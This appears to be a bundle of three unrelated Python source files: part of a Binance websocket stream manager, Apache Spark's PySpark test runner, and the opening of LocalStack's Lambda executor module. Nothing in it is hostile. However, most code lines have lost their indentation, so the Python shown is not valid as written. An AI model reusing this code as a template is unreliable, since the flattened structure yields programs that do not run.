        to keep the payload length under 8000 chars and avoid reconnects
:param params: params of subscribe payload
:type params: list
:param method: SUBSCRIBE or UNSUBSCRIBE
:type method: str
        :param max_items_per_request: max number of params per request; if there are more, the payload gets split
        :type max_items_per_request: int
:return: list or False
"""
if self.is_exchange_type('cex'):
count_items = 0
add_params = []
payload = []
for param in params:
add_params.append(param)
count_items += 1
if count_items > max_items_per_request:
add_payload = {"method": method,
"params": add_params,
"id": self.get_request_id()}
payload.append(add_payload)
count_items = 0
add_params = []
if len(add_params) > 0:
add_payload = {"method": method,
"params": add_params,
"id": self.get_request_id()}
payload.append(add_payload)
return payload
else:
return False
elif self.is_exchange_type('dex'):
pass
else:
return False
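    # Illustrative sketch, assuming `ubwa` is a BinanceWebSocketApiManager instance of a
    # CEX exchange and `params` is a long list of subscription strings: the result is a
    # list of SUBSCRIBE payload dicts with roughly `max_items_per_request` params each,
    # small enough to stay below the ~8000 char limit of websocket.send():
    #
    #   payloads = ubwa.split_payload(params, "SUBSCRIBE")
    #   if payloads:
    #       for payload in payloads:
    #           ...  # e.g., append each payload to the stream's payload list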
def start_monitoring_api(self, host='127.0.0.1', port=64201, warn_on_update=True):
"""
Start the monitoring API server
Take a look into the
`Wiki <https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/UNICORN-Monitoring-API-Service>`_
to see how this works!
:param host: listening ip address, use 0.0.0.0 or a specific address (default: 127.0.0.1)
:type host: str
:param port: listening port number (default: 64201)
:type port: int
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
"""
thread = threading.Thread(target=self._start_monitoring_api_thread,
args=(host, port, warn_on_update),
name="monitoring_api")
thread.start()
return True
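    # Illustrative sketch, assuming `ubwa` is a BinanceWebSocketApiManager instance:
    #
    #   ubwa.start_monitoring_api(host="127.0.0.1", port=64201)
    #
    # This spawns the "monitoring_api" thread and returns True immediately.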
def stop_manager_with_all_streams(self):
"""
Stop the BinanceWebSocketApiManager with all streams and management threads
"""
logger.info("BinanceWebSocketApiManager.stop_manager_with_all_streams() - Stopping "
"unicorn_binance_websocket_api_manager " + self.version + " ...")
for stream_id in self.stream_list:
self.stop_stream(stream_id)
# stop monitoring API services
self.stop_monitoring_api()
# send signal to all threads
self.stop_manager_request = True
def stop_monitoring_api(self):
"""
Stop the monitoring API service
:return: bool
"""
try:
if not isinstance(self.monitoring_api_server, bool):
self.monitoring_api_server.stop()
return True
except AttributeError as error_msg:
logger.info("BinanceWebSocketApiManager.stop_monitoring_api() - can not execute "
"self.monitoring_api_server.stop() - info: " + str(error_msg))
return False
def stop_stream(self, stream_id):
"""
Stop a specific stream
:param stream_id: id of a stream
:type stream_id: str
:return: bool
"""
# stop a specific stream by stream_id
logger.info(f"BinanceWebSocketApiManager.stop_stream({stream_id}){self.get_debug_log()}")
self.stream_is_stopping(stream_id)
try:
self.stream_list[stream_id]['stop_request'] = True
except KeyError:
return False
try:
del self.restart_requests[stream_id]
except KeyError:
pass
self.delete_listen_key_by_stream_id(stream_id)
try:
loop = self.get_event_loop_by_stream_id(stream_id)
try:
if loop.is_running():
logger.debug(f"BinanceWebSocketApiManager.stop_stream({stream_id}) - Closing event_loop "
f"of stream_id {stream_id}")
loop.close()
except AttributeError as error_msg:
logger.debug(f"BinanceWebSocketApiManager.stop_stream({stream_id}) - AttributeError - {error_msg}")
except RuntimeError as error_msg:
logger.debug(f"BinanceWebSocketApiManager.stop_stream({stream_id}) - RuntimeError - {error_msg}")
except RuntimeWarning as error_msg:
logger.debug(f"BinanceWebSocketApiManager.stop_stream({stream_id}) - RuntimeWarning - {error_msg}")
return True
def stop_stream_as_crash(self, stream_id):
"""
Stop a specific stream with 'crashed' status
:param stream_id: id of a stream
:type stream_id: str
:return: bool
"""
# stop a specific stream by stream_id
logger.critical(f"BinanceWebSocketApiManager.stop_stream_as_crash({stream_id}){self.get_debug_log()}")
try:
del self.restart_requests[stream_id]
except KeyError:
pass
try:
self.stream_list[stream_id]['crash_request'] = True
except KeyError:
return False
try:
loop = self.get_event_loop_by_stream_id(stream_id)
try:
if loop.is_running():
logger.debug(f"BinanceWebSocketApiManager.stop_stream_as_crash({stream_id}) - Closing event_loop "
f"of stream_id {stream_id}")
loop.close()
except AttributeError as error_msg:
logger.debug(f"BinanceWebSocketApiManager.stop_stream_as_crash({stream_id}) - AttributeError - "
f"{error_msg}")
except RuntimeError as error_msg:
logger.debug(f"BinanceWebSocketApiManager.stop_stream_as_crash({stream_id}) - RuntimeError - {error_msg}")
except RuntimeWarning as error_msg:
logger.debug(f"BinanceWebSocketApiManager.stop_stream_as_crash({stream_id}) - RuntimeWarning - {error_msg}")
return True
def stream_is_crashing(self, stream_id, error_msg=False):
"""
        If a stream cannot heal itself because of a wrong parameter (wrong market or channel type), it calls this method
:param stream_id: id of a stream
:type stream_id: str
:param error_msg: Error msg to add to the stream status!
:type error_msg: str
"""
logger.critical(f"BinanceWebSocketApiManager.stream_is_crashing({stream_id}){self.get_debug_log()}")
if self.stream_list[stream_id]['last_stream_signal'] is not None and \
self.stream_list[stream_id]['last_stream_signal'] != "DISCONNECT":
self.process_stream_signals("DISCONNECT", stream_id)
self.stream_list[stream_id]['last_stream_signal'] = "DISCONNECT"
self.stream_list[stream_id]['has_stopped'] = time.time()
self.stream_list[stream_id]['status'] = "crashed"
self.set_socket_is_ready(stream_id) # necessary to release `create_stream()`
if error_msg:
self.stream_list[stream_id]['status'] += " - " + str(error_msg)
def stream_is_stopping(self, stream_id):
"""
        Streams report their shutdown with this call
:param stream_id: id of a stream
:type stream_id: str
:return: bool
"""
logger.info(f"BinanceWebSocketApiManager.stream_is_stopping({stream_id}){self.get_debug_log()}")
try:
self.stream_list[stream_id]['has_stopped'] = time.time()
self.stream_list[stream_id]['status'] = "stopped"
return True
except KeyError:
return False
def subscribe_to_stream(self, stream_id, channels=[], markets=[]):
"""
Subscribe channels and/or markets to an existing stream
If you provide one channel and one market, then every subscribed market is going to get added to the new channel
and all subscribed channels are going to get added to the new market!
        `How are the parameters channels and markets used with subscriptions?
        <https://unicorn-binance-websocket-api.docs.lucit.tech/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.manager.BinanceWebSocketApiManager.create_stream>`_
:param stream_id: id of a stream
:type stream_id: str
:param channels: provide the channels you wish to stream
:type channels: str, tuple, list, set
:param markets: provide the markets you wish to stream
:type markets: str, tuple, list, set
:return: bool
"""
logger.info(f"BinanceWebSocketApiManager.subscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
f", " + str(markets) + f"){self.get_debug_log()} - started ... -")
try:
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if type(channels) is set:
channels = list(channels)
if type(markets) is set:
markets = list(markets)
except KeyError:
logger.error("BinanceWebSocketApiManager.subscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") KeyError: setting a restart request for this stream ...")
self.stream_is_stopping(stream_id)
self.set_restart_request(stream_id)
return False
if type(self.stream_list[stream_id]['channels']) is str:
self.stream_list[stream_id]['channels'] = [self.stream_list[stream_id]['channels']]
if type(self.stream_list[stream_id]['markets']) is str:
self.stream_list[stream_id]['markets'] = [self.stream_list[stream_id]['markets']]
if type(self.stream_list[stream_id]['channels']) is set:
self.stream_list[stream_id]['channels'] = list(self.stream_list[stream_id]['channels'])
if type(self.stream_list[stream_id]['markets']) is set:
self.stream_list[stream_id]['markets'] = list(self.stream_list[stream_id]['markets'])
self.stream_list[stream_id]['channels'] = list(set(self.stream_list[stream_id]['channels'] + channels))
markets_new = []
for market in markets:
if "!" in market \
or market == "allMiniTickers" \
or market == "allTickers" \
or market == "blockheight" \
or market == "$all":
markets_new.append(market)
else:
if self.is_exchange_type('dex'):
markets_new.append(str(market).upper())
elif self.is_exchange_type('cex'):
markets_new.append(str(market).lower())
self.stream_list[stream_id]['markets'] = list(set(self.stream_list[stream_id]['markets'] + markets_new))
payload = self.create_payload(stream_id, "subscribe",
channels=self.stream_list[stream_id]['channels'],
markets=self.stream_list[stream_id]['markets'])
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
# control subscription limit:
# https://github.com/binance-exchange/binance-official-api-docs/blob/5fccfd572db2f530e25e302c02be5dec12759cf9/CHANGELOG.md#2020-04-23
if self.stream_list[stream_id]['subscriptions'] > self.max_subscriptions_per_stream:
self.stop_stream_as_crash(stream_id)
error_msg = "The limit of " + str(self.max_subscriptions_per_stream) + " subscriptions per stream has " \
"been exceeded!"
logger.critical(f"BinanceWebSocketApiManager.subscribe_to_stream({str(stream_id)}) "
f"Info: {str(error_msg)}")
self.stream_is_crashing(stream_id, error_msg)
if self.throw_exception_if_unrepairable:
raise StreamRecoveryError("stream_id " + str(stream_id) + ": " + str(error_msg))
return False
for item in payload:
self.stream_list[stream_id]['payload'].append(item)
logger.info("BinanceWebSocketApiManager.subscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") finished ...")
return True
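    # Illustrative sketch, assuming `ubwa` is a BinanceWebSocketApiManager instance and
    # `stream_id` belongs to an existing stream; the channel and market names are examples:
    #
    #   ubwa.subscribe_to_stream(stream_id, channels=['kline_1m'], markets=['btcusdt', 'ethusdt'])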
def unsubscribe_from_stream(self, stream_id, channels=None, markets=None):
"""
        Unsubscribe channels and/or markets from an existing stream
If you provide one channel and one market, then all subscribed markets from the specific channel and all
subscribed channels from the specific markets are going to be removed!
        `How are the parameters channels and markets used with subscriptions?
        <https://unicorn-binance-websocket-api.docs.lucit.tech/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.manager.BinanceWebSocketApiManager.create_stream>`_
:param stream_id: id of a stream
:type stream_id: str
:param channels: provide the channels you wish to stream
:type channels: str, tuple, list, set
:param markets: provide the markets you wish to stream
:type markets: str, tuple, list, set
:return: bool
"""
logger.info(f"BinanceWebSocketApiManager.unsubscribe_from_stream(" + str(stream_id) + ", " + str(channels) +
f", " + str(markets) + f"){self.get_debug_log()} - started ... -")
if markets is None:
markets = []
if channels is None:
channels = []
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if type(self.stream_list[stream_id]['channels']) is str:
self.stream_list[stream_id]['channels'] = [self.stream_list[stream_id]['channels']]
if type(self.stream_list[stream_id]['markets']) is str:
self.stream_list[stream_id]['markets'] = [self.stream_list[stream_id]['markets']]
for channel in channels:
try:
self.stream_list[stream_id]['channels'].remove(channel)
except ValueError:
pass
for i in range(len(markets)):
markets[i] = markets[i].lower()
for market in markets:
if re.match(r'[a-zA-Z0-9]{41,43}', market) is None:
try:
self.stream_list[stream_id]['markets'].remove(market)
except ValueError:
pass
payload = self.create_payload(stream_id, "unsubscribe",
channels=channels, markets=markets)
for item in payload:
self.stream_list[stream_id]['payload'].append(item)
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
logger.info("BinanceWebSocketApiManager.unsubscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") finished ...")
return True
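    # Illustrative sketch, assuming the same `ubwa` and `stream_id` as above:
    #
    #   ubwa.unsubscribe_from_stream(stream_id, channels=['kline_1m'], markets=['btcusdt'])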
def wait_till_stream_has_started(self, stream_id):
"""
        Returns `True` as soon as a specific stream has started
:param stream_id: id of a stream
:type stream_id: str
:return: bool
"""
        # will return `True` as soon as the stream has received its first data row
try:
while self.stream_list[stream_id]['last_heartbeat'] is None:
time.sleep(0.1)
return True
except KeyError:
return False
def wait_till_stream_has_stopped(self, stream_id):
"""
        Returns `True` as soon as a specific stream has stopped itself
:param stream_id: id of a stream
:type stream_id: str
:return: bool
"""
try:
while self.stream_list[stream_id]['has_stopped'] is False:
time.sleep(0.1)
return True
except KeyError:
return False
|
run-tests.py
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import logging
from optparse import OptionParser
import os
import re
import shutil
import subprocess
import sys
import tempfile
from threading import Thread, Lock
import time
import uuid
if sys.version < '3':
import Queue
else:
import queue as Queue
from distutils.version import LooseVersion
from multiprocessing import Manager
# Append `SPARK_HOME/dev` to the Python path so that we can import the sparktestsupport module
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), "../dev/"))
from sparktestsupport import SPARK_HOME # noqa (suppress pep8 warnings)
from sparktestsupport.shellutils import which, subprocess_check_output # noqa
from sparktestsupport.modules import all_modules, pyspark_sql # noqa
python_modules = dict((m.name, m) for m in all_modules if m.python_test_goals if m.name != 'root')
def print_red(text):
print('\033[31m' + text + '\033[0m')
SKIPPED_TESTS = Manager().dict()
LOG_FILE = os.path.join(SPARK_HOME, "python/unit-tests.log")
FAILURE_REPORTING_LOCK = Lock()
LOGGER = logging.getLogger()
# Find out where the assembly jars are located.
for scala in ["2.11", "2.12"]:
build_dir = os.path.join(SPARK_HOME, "assembly", "target", "scala-" + scala)
if os.path.isdir(build_dir):
SPARK_DIST_CLASSPATH = os.path.join(build_dir, "jars", "*")
break
else:
raise Exception("Cannot find assembly build directory, please build Spark first.")
def run_individual_python_test(target_dir, test_name, pyspark_python):
env = dict(os.environ)
env.update({
'SPARK_DIST_CLASSPATH': SPARK_DIST_CLASSPATH,
'SPARK_TESTING': '1',
'SPARK_PREPEND_CLASSES': '1',
'PYSPARK_PYTHON': which(pyspark_python),
'PYSPARK_DRIVER_PYTHON': which(pyspark_python)
})
# Create a unique temp directory under 'target/' for each run. The TMPDIR variable is
# recognized by the tempfile module to override the default system temp directory.
tmp_dir = os.path.join(target_dir, str(uuid.uuid4()))
while os.path.isdir(tmp_dir):
tmp_dir = os.path.join(target_dir, str(uuid.uuid4()))
os.mkdir(tmp_dir)
env["TMPDIR"] = tmp_dir
# Also override the JVM's temp directory by setting driver and executor options.
spark_args = [
"--conf", "spark.driver.extraJavaOptions=-Djava.io.tmpdir={0}".format(tmp_dir),
"--conf", "spark.executor.extraJavaOptions=-Djava.io.tmpdir={0}".format(tmp_dir),
"pyspark-shell"
]
env["PYSPARK_SUBMIT_ARGS"] = " ".join(spark_args)
LOGGER.info("Starting test(%s): %s", pyspark_python, test_name)
start_time = time.time()
try:
per_test_output = tempfile.TemporaryFile()
retcode = subprocess.Popen(
[os.path.join(SPARK_HOME, "bin/pyspark"), test_name],
stderr=per_test_output, stdout=per_test_output, env=env).wait()
shutil.rmtree(tmp_dir, ignore_errors=True)
except:
LOGGER.exception("Got exception while running %s with %s", test_name, pyspark_python)
# Here, we use os._exit() instead of sys.exit() in order to force Python to exit even if
# this code is invoked from a thread other than the main thread.
os._exit(1)
duration = time.time() - start_time
# Exit on the first failure.
if retcode != 0:
try:
with FAILURE_REPORTING_LOCK:
with open(LOG_FILE, 'ab') as log_file:
per_test_output.seek(0)
log_file.writelines(per_test_output)
per_test_output.seek(0)
for line in per_test_output:
decoded_line = line.decode()
if not re.match('[0-9]+', decoded_line):
print(decoded_line, end='')
per_test_output.close()
except:
LOGGER.exception("Got an exception while trying to print failed test output")
finally:
print_red("\nHad test failures in %s with %s; see logs." % (test_name, pyspark_python))
# Here, we use os._exit() instead of sys.exit() in order to force Python to exit even if
# this code is invoked from a thread other than the main thread.
os._exit(-1)
else:
skipped_counts = 0
try:
per_test_output.seek(0)
            # This expects skipped test output from unittest when the verbosity level is
            # 2 (or the --verbose option is enabled).
decoded_lines = map(lambda line: line.decode(), iter(per_test_output))
skipped_tests = list(filter(
lambda line: re.search(r'test_.* \(pyspark\..*\) ... skipped ', line),
decoded_lines))
skipped_counts = len(skipped_tests)
if skipped_counts > 0:
key = (pyspark_python, test_name)
SKIPPED_TESTS[key] = skipped_tests
per_test_output.close()
except:
import traceback
print_red("\nGot an exception while trying to store "
"skipped test output:\n%s" % traceback.format_exc())
# Here, we use os._exit() instead of sys.exit() in order to force Python to exit even if
# this code is invoked from a thread other than the main thread.
os._exit(-1)
if skipped_counts != 0:
LOGGER.info(
"Finished test(%s): %s (%is) ... %s tests were skipped", pyspark_python, test_name,
duration, skipped_counts)
else:
LOGGER.info(
"Finished test(%s): %s (%is)", pyspark_python, test_name, duration)
def get_default_python_executables():
python_execs = [x for x in ["python2.7", "python3.4", "pypy"] if which(x)]
if "python2.7" not in python_execs:
LOGGER.warning("Not testing against `python2.7` because it could not be found; falling"
" back to `python` instead")
python_execs.insert(0, "python")
return python_execs
def parse_opts():
parser = OptionParser(
prog="run-tests"
)
parser.add_option(
"--python-executables", type="string", default=','.join(get_default_python_executables()),
help="A comma-separated list of Python executables to test against (default: %default)"
)
parser.add_option(
"--modules", type="string",
default=",".join(sorted(python_modules.keys())),
help="A comma-separated list of Python modules to test (default: %default)"
)
parser.add_option(
"-p", "--parallelism", type="int", default=4,
help="The number of suites to test in parallel (default %default)"
)
parser.add_option(
"--verbose", action="store_true",
help="Enable additional debug logging"
)
(opts, args) = parser.parse_args()
if args:
parser.error("Unsupported arguments: %s" % ' '.join(args))
if opts.parallelism < 1:
parser.error("Parallelism cannot be less than 1")
return opts
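# Illustrative invocation sketch, assuming the script is started from SPARK_HOME and that
# a module name such as "pyspark-sql" is defined in sparktestsupport.modules:
#
#   ./python/run-tests.py --python-executables=python2.7,python3.4 \
#       --modules=pyspark-sql --parallelism=2 --verbose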
def _check_coverage(python_exec):
    # Make sure coverage is installed.
try:
subprocess_check_output(
[python_exec, "-c", "import coverage"],
stderr=open(os.devnull, 'w'))
except:
print_red("Coverage is not installed in Python executable '%s' "
"but 'COVERAGE_PROCESS_START' environment variable is set, "
"exiting." % python_exec)
sys.exit(-1)
def main():
opts = parse_opts()
if (opts.verbose):
log_level = logging.DEBUG
else:
log_level = logging.INFO
logging.basicConfig(stream=sys.stdout, level=log_level, format="%(message)s")
LOGGER.info("Running PySpark tests. Output is in %s", LOG_FILE)
if os.path.exists(LOG_FILE):
os.remove(LOG_FILE)
python_execs = opts.python_executables.split(',')
modules_to_test = []
for module_name in opts.modules.split(','):
if module_name in python_modules:
modules_to_test.append(python_modules[module_name])
else:
print("Error: unrecognized module '%s'. Supported modules: %s" %
(module_name, ", ".join(python_modules)))
sys.exit(-1)
LOGGER.info("Will test against the following Python executables: %s", python_execs)
LOGGER.info("Will test the following Python modules: %s", [x.name for x in modules_to_test])
task_queue = Queue.PriorityQueue()
for python_exec in python_execs:
# Check if the python executable has coverage installed when 'COVERAGE_PROCESS_START'
        # environment variable is set.
if "COVERAGE_PROCESS_START" in os.environ:
_check_coverage(python_exec)
python_implementation = subprocess_check_output(
[python_exec, "-c", "import platform; print(platform.python_implementation())"],
universal_newlines=True).strip()
LOGGER.debug("%s python_implementation is %s", python_exec, python_implementation)
LOGGER.debug("%s version is: %s", python_exec, subprocess_check_output(
[python_exec, "--version"], stderr=subprocess.STDOUT, universal_newlines=True).strip())
for module in modules_to_test:
if python_implementation not in module.blacklisted_python_implementations:
for test_goal in module.python_test_goals:
heavy_tests = ['pyspark.streaming.tests', 'pyspark.mllib.tests',
'pyspark.tests', 'pyspark.sql.tests', 'pyspark.ml.tests']
if any(map(lambda prefix: test_goal.startswith(prefix), heavy_tests)):
priority = 0
else:
priority = 100
task_queue.put((priority, (python_exec, test_goal)))
# Create the target directory before starting tasks to avoid races.
target_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'target'))
if not os.path.isdir(target_dir):
os.mkdir(target_dir)
def process_queue(task_queue):
while True:
try:
(priority, (python_exec, test_goal)) = task_queue.get_nowait()
except Queue.Empty:
break
try:
run_individual_python_test(target_dir, test_goal, python_exec)
finally:
task_queue.task_done()
start_time = time.time()
for _ in range(opts.parallelism):
worker = Thread(target=process_queue, args=(task_queue,))
worker.daemon = True
worker.start()
try:
task_queue.join()
except (KeyboardInterrupt, SystemExit):
print_red("Exiting due to interrupt")
sys.exit(-1)
total_duration = time.time() - start_time
LOGGER.info("Tests passed in %i seconds", total_duration)
for key, lines in sorted(SKIPPED_TESTS.items()):
pyspark_python, test_name = key
LOGGER.info("\nSkipped tests in %s with %s:" % (test_name, pyspark_python))
for line in lines:
LOGGER.info(" %s" % line.rstrip())
if __name__ == "__main__":
main()
|
lambda_executors.py
|
import base64
import contextlib
import glob
import json
import logging
import os
import re
import subprocess
import sys
import threading
import time
import traceback
import uuid
from multiprocessing import Process, Queue
from typing import Any, Callable, Dict, List, Optional, Tuple, Union
from localstack import config
from localstack.services.awslambda.lambda_utils import (
LAMBDA_RUNTIME_JAVA8,
LAMBDA_RUNTIME_JAVA8_AL2,
LAMBDA_RUNTIME_JAVA11,
LAMBDA_RUNTIME_PROVIDED,
)
from localstack.services.install import GO_LAMBDA_RUNTIME, INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils import bootstrap
from localstack.utils.aws import aws_stack
from localstack.utils.aws.aws_models import LambdaFunction
from localstack.utils.aws.dead_letter_queue import (
lambda_error_to_dead_letter_queue,
sqs_error_to_dead_letter_queue,
)
from localstack.utils.aws.lambda_destinations import lambda_result_to_destination
from localstack.utils.cloudwatch.cloudwatch_util import cloudwatched, store_cloudwatch_logs
from localstack.utils.common import (
TMP_FILES,
CaptureOutput,
get_all_subclasses,
get_free_tcp_port,
in_docker,
json_safe,
last_index_of,
long_uid,
md5,
now,
run,
save_file,
short_uid,
timestamp,
to_bytes,
to_str,
)
from localstack.utils.docker import DOCKER_CLIENT, ContainerException, PortMappings
from localstack.utils.run import FuncThread
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = "cloud.localstack.LambdaExecutor"
LAMBDA_HANDLER_ENV_VAR_NAME = "_HANDLER"
EVENT_FILE_PATTERN = "%s/lambda.event.*.json" % config.TMP_FOLDER
LAMBDA_SERVER_UNIQUE_PORTS = 500
LAMBDA_SERVER_PORT_OFFSET = 5000
LAMBDA_API_UNIQUE_PORTS = 500
LAMBDA_API_PORT_OFFSET = 9000
MAX_ENV_ARGS_LENGTH = 20000
INTERNAL_LOG_PREFIX = "ls-daemon: "
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000
# SQS event source name
EVENT_SOURCE_SQS = "aws:sqs"
# IP address of main Docker container (lazily initialized)
DOCKER_MAIN_CONTAINER_IP = None
# maps lambda arns to concurrency locks
LAMBDA_CONCURRENCY_LOCK = {}
# CWD folder of handler code in Lambda containers
DOCKER_TASK_FOLDER = "/var/task"
# Lambda event type
LambdaEvent = Union[Dict[str, Any], str, bytes]
class InvocationException(Exception):
def __init__(self, message, log_output, result=None):
super(InvocationException, self).__init__(message)
self.log_output = log_output
self.result = result
class LambdaContext(object):
DEFAULT_MEMORY_LIMIT = 1536
def __init__(
self, lambda_function: LambdaFunction, qualifier: str = None, context: Dict[str, Any] = None
):
context = context or {}
self.function_name = lambda_function.name()
self.function_version = lambda_function.get_qualifier_version(qualifier)
self.client_context = context.get("client_context")
self.invoked_function_arn = lambda_function.arn()
if qualifier:
self.invoked_function_arn += ":" + qualifier
self.cognito_identity = context.get("identity")
self.aws_request_id = str(uuid.uuid4())
self.memory_limit_in_mb = lambda_function.memory_size or self.DEFAULT_MEMORY_LIMIT
self.log_group_name = "/aws/lambda/%s" % self.function_name
self.log_stream_name = "%s/[1]%s" % (timestamp(format="%Y/%m/%d"), short_uid())
def get_remaining_time_in_millis(self):
# TODO implement!
return 1000 * 60
class AdditionalInvocationOptions:
# Maps file keys to file paths. The keys can be used as placeholders in the env. variables
# and command args to reference files - e.g., given `files_to_add` as {"f1": "/local/path"} and
# `env_updates` as {"MYENV": "{f1}"}, the Lambda handler will receive an environment variable
# `MYENV=/lambda/path` and the file /lambda/path will be accessible to the Lambda handler
# (either locally, or inside Docker).
files_to_add: Dict[str, str]
# Environment variable updates to apply for the invocation
env_updates: Dict[str, str]
# Updated command to use for starting the Lambda process (or None)
updated_command: Optional[str]
# Updated handler as entry point of Lambda function (or None)
updated_handler: Optional[str]
def __init__(
self,
files_to_add=None,
env_updates=None,
updated_command=None,
updated_handler=None,
):
self.files_to_add = files_to_add or {}
self.env_updates = env_updates or {}
self.updated_command = updated_command
self.updated_handler = updated_handler
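# Illustrative sketch of the placeholder mechanics described above, assuming
# "/local/path/cert.pem" is a file on the host: the executor makes the file available to
# the Lambda environment and replaces "{f1}" in env_updates (and in updated_command, if
# set) with the resulting path:
#
#   options = AdditionalInvocationOptions(
#       files_to_add={"f1": "/local/path/cert.pem"},
#       env_updates={"MYENV": "{f1}"},
#   )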
class InvocationResult:
def __init__(self, result, log_output=""):
if isinstance(result, InvocationResult):
raise Exception("Unexpected invocation result type: %s" % result)
self.result = result
self.log_output = log_output or ""
class InvocationContext:
lambda_function: LambdaFunction
function_version: str
handler: str
event: LambdaEvent
lambda_command: Union[str, List[str]] # TODO: change to List[str] ?
docker_flags: Union[str, List[str]] # TODO: change to List[str] ?
environment: Dict[str, str]
context: LambdaContext
def __init__(
self,
lambda_function: LambdaFunction,
event: LambdaEvent,
environment=None,
context=None,
lambda_command=None,
docker_flags=None,
function_version=None,
):
self.lambda_function = lambda_function
self.handler = lambda_function.handler
self.event = event
self.environment = {} if environment is None else environment
self.context = {} if context is None else context
self.lambda_command = lambda_command
self.docker_flags = docker_flags
self.function_version = function_version
class LambdaExecutorPlugin:
"""Plugin abstraction that allows to hook in additional functionality into the Lambda executors."""
INSTANCES: List["LambdaExecutorPlugin"] = []
def initialize(self):
"""Called once, for any active plugin to run initialization logic (e.g., downloading dependencies).
Uses lazy initialization - i.e., runs only after the first should_apply() call returns True"""
pass
def should_apply(self, context: InvocationContext) -> bool:
"""Whether the plugin logic should get applied for the given Lambda invocation context."""
return False
def prepare_invocation(
self, context: InvocationContext
) -> Optional[AdditionalInvocationOptions]:
"""Return additional invocation options for given Lambda invocation context."""
return None
def process_result(
self, context: InvocationContext, result: InvocationResult
) -> InvocationResult:
"""Optionally modify the result returned from the given Lambda invocation."""
return result
def init_function_configuration(self, lambda_function: LambdaFunction):
"""Initialize the configuration of the given function upon creation or function update."""
pass
def init_function_code(self, lambda_function: LambdaFunction):
"""Initialize the code of the given function upon creation or function update."""
pass
@classmethod
def get_plugins(cls) -> List["LambdaExecutorPlugin"]:
if not cls.INSTANCES:
classes = get_all_subclasses(LambdaExecutorPlugin)
cls.INSTANCES = [clazz() for clazz in classes]
return cls.INSTANCES
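# Minimal plugin sketch (hypothetical example): subclasses of LambdaExecutorPlugin are
# discovered automatically via get_all_subclasses() in get_plugins(); this one would add
# an extra environment variable to every Python Lambda invocation:
#
#   class MyEnvPlugin(LambdaExecutorPlugin):
#       def should_apply(self, context: InvocationContext) -> bool:
#           return is_python_runtime(context.lambda_function)
#
#       def prepare_invocation(self, context: InvocationContext) -> Optional[AdditionalInvocationOptions]:
#           return AdditionalInvocationOptions(env_updates={"MY_FLAG": "1"})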
def get_from_event(event: Dict, key: str):
"""Retrieve a field with the given key from the list of Records within 'event'."""
try:
return event["Records"][0][key]
except KeyError:
return None
def is_java_lambda(lambda_details):
runtime = getattr(lambda_details, "runtime", lambda_details)
return runtime in [LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA8_AL2, LAMBDA_RUNTIME_JAVA11]
def is_nodejs_runtime(lambda_details):
runtime = getattr(lambda_details, "runtime", lambda_details) or ""
return runtime.startswith("nodejs")
def is_python_runtime(lambda_details):
runtime = getattr(lambda_details, "runtime", lambda_details) or ""
return runtime.startswith("python")
def _store_logs(
lambda_function: LambdaFunction, log_output: str, invocation_time=None, container_id=None
):
log_group_name = "/aws/lambda/%s" % lambda_function.name()
container_id = container_id or short_uid()
invocation_time = invocation_time or int(time.time() * 1000)
invocation_time_secs = int(invocation_time / 1000)
time_str = time.strftime("%Y/%m/%d", time.gmtime(invocation_time_secs))
log_stream_name = "%s/[LATEST]%s" % (time_str, container_id)
return store_cloudwatch_logs(log_group_name, log_stream_name, log_output, invocation_time)
def get_main_endpoint_from_container():
global DOCKER_MAIN_CONTAINER_IP
if not config.HOSTNAME_FROM_LAMBDA and DOCKER_MAIN_CONTAINER_IP is None:
DOCKER_MAIN_CONTAINER_IP = False
try:
if in_docker():
DOCKER_MAIN_CONTAINER_IP = bootstrap.get_main_container_ip()
LOG.info("Determined main container target IP: %s" % DOCKER_MAIN_CONTAINER_IP)
except Exception as e:
container_name = bootstrap.get_main_container_name()
LOG.info(
'Unable to get IP address of main Docker container "%s": %s' % (container_name, e)
)
# return (1) predefined endpoint host, or (2) main container IP, or (3) Docker host (e.g., bridge IP)
return (
config.HOSTNAME_FROM_LAMBDA or DOCKER_MAIN_CONTAINER_IP or config.DOCKER_HOST_FROM_CONTAINER
)
def rm_docker_container(container_name_or_id, check_existence=False, safe=False):
# TODO: remove method / move to docker module
if not container_name_or_id:
return
if check_existence and container_name_or_id not in DOCKER_CLIENT.get_running_container_names():
# TODO: check names as well as container IDs!
return
try:
DOCKER_CLIENT.remove_container(container_name_or_id)
except Exception:
if not safe:
raise
class LambdaAsyncLocks:
locks: Dict[str, Union[threading.Semaphore, threading.Lock]]
creation_lock: threading.Lock
def __init__(self):
self.locks = {}
self.creation_lock = threading.Lock()
def assure_lock_present(
self, key: str, lock: Union[threading.Semaphore, threading.Lock]
) -> Union[threading.Semaphore, threading.Lock]:
with self.creation_lock:
return self.locks.setdefault(key, lock)
